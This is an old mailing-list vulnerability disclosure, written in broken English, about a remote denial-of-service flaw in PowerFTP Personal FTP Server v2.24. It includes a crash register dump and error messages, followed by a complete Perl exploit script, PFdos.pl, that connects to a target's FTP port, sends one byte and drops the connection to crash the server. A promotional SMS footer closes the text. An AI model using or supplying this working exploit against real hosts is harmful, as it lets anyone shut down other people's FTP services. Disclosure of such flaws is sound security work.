hi
The PowerFTPd is available from vendor Cooolsoft's website:
 http://www.cooolsoft.com
 I found a vulnerability has PowerFTP that allows a remote
user--any user--to shut down the ftp server (tested
 on v 2.24)
 I alerted coolsoft (05/10/2002) and as I did not have a
 response until A now
this attack back is due A the bad management of erreures
due A the deconnection of the distant host I realised a
scripte Perl which launches this attack...and after the
state of the registers is:

Unknown exception - code c0000025 (first chance)
Stack overflow - code c00000fd (first chance)
eax=00033070 ebx=0012ffb4 ecx=0040371c edx=7846f5b5
esi=0003311c edi=00000001
eip=77ea98ca esp=00032d60 ebp=00033050 iopl=0 nv up
ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b
gs=0000 efl=00000206
kernel32!UnhandledExceptionFilter+25

and we have this message:


 L exeption Exeption logicielle inconnue (0x0eedfade) s'est
 produite dans l'application a l'emplacement 0x77e7f142

 Exeption EFtpCtrlsocketexeption in module FTPServer.exe at
 00059DE6. Data in buffer , cant change size

 This was tested against PowerFTP Personal FTP Server v2.24

exploit:


#!/usr/bin/perl -w
##
# tool:    PFdos.pl
# author:   securma@caramail.com
# purpose:  allows a remote user--any user--to shut
down the ftp server
# greetz: all friend in marocit and #crack.fr
(especially christal)
##

use Socket;
if (not $ARGV[0]) {
  print qq~
     Usage: pfdos.pl <host>
  ~;
exit;}

$ip=$ARGV[0];
print "+++++++++++++++++++++++\n\n";
print "PowerFTP DOS \n\n";
print "by securma massine \n\n";
print "securma\@caramail.com \n\n";
print "+++++++++++++++++++++++\n\n";
print "Sending Exploit Code to host: " . $ip . "\n\n";
sendexplt("A");
sub sendexplt {
 my ($pstr)=@_;
  $target= inet_aton($ip) || die("inet_aton
problems");
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')
||0) ||
 die("Socket problems\n");
 if(connect(S,pack "SnA4x8",2,21,$target)){
 select(S);
    $|=1;
 print $pstr;
 sleep 3;
   close(S);
 } else { die("Can't connect...\n"); }
}








_________________________________________________________
Gagnes une PS2 ! Envoies un SMS avec le code PS au 61166
(0,34€ Hors coût du SMS)